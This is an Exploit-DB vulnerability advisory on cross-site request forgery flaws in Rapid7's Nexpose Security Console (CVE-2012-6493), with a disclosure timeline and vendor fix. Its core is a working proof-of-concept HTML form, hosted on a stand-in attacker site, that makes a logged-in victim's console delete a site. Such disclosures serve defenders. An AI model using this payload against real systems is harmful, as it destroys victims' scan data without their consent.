Nexpose Security Console – Cross-Site Request Forgery

• Exploit Database
• 10 阅读

• 作者： Robert Gilbert
  日期： 2013-01-06
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/23924/

• Product: Nexpose Security Console
  Vendor: Rapid7
  Version: < 5.5.3
  Tested Version: 5.5.1
  Vendor Notified Date: December 19, 2012
  Release Date: January 2, 2013
  Risk: High
  Authentication: None required
  Remote: Yes
  
  Description:
  Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose 
  Security Console 5.5.3 and below allow remote attackers to submit 
  actions on a legitimate user’s behalf.
  By not properly checking each URL, an attacker can execute requests on 
  behalf of a legitimate user.
  If an authenticated user is tricked into visiting a specially crafted 
  page, it may be possible to perform user-initiated actions on the web 
  application using the victim’s established session.
  Successful exploitation of this vulnerability resulted in deleting scan 
  data and sites during the proof-of-concept.
  
  Exploit steps for proof-of-concept:
  1.Create an external site/page: 
  http://attackersite.com/nexpose-csrf.htm that contains:
  [code]
  <html>
   <!-- Nexpose CSRF PoC -->
   <body>
   <form 
  action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" 
  method="POST"enctype="multipart/form-data">
   <input type="submit" value="delete site" />
   </form>
   <script>
   //document.forms[0].submit(); //uncomment to auto-submit
   </script>
   </body>
  </html>
  [/code]
  2.Lure victim to http://attackersite.com/nexpose-csrf.htm.
  3.Site with ID 1 is deleted when form is submitted.
  
  Vendor Notified: Yes
  Vendor Response: Quickly escalated and resolved.
  Vendor Update: Remediated in 5.5.4.
  
  Reference:
  CVE-2012-6493
  https://community.rapid7.com/docs/DOC-2065#release5
  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
  
  Credit:
  Robert Gilbert
  HALOCK Security Labs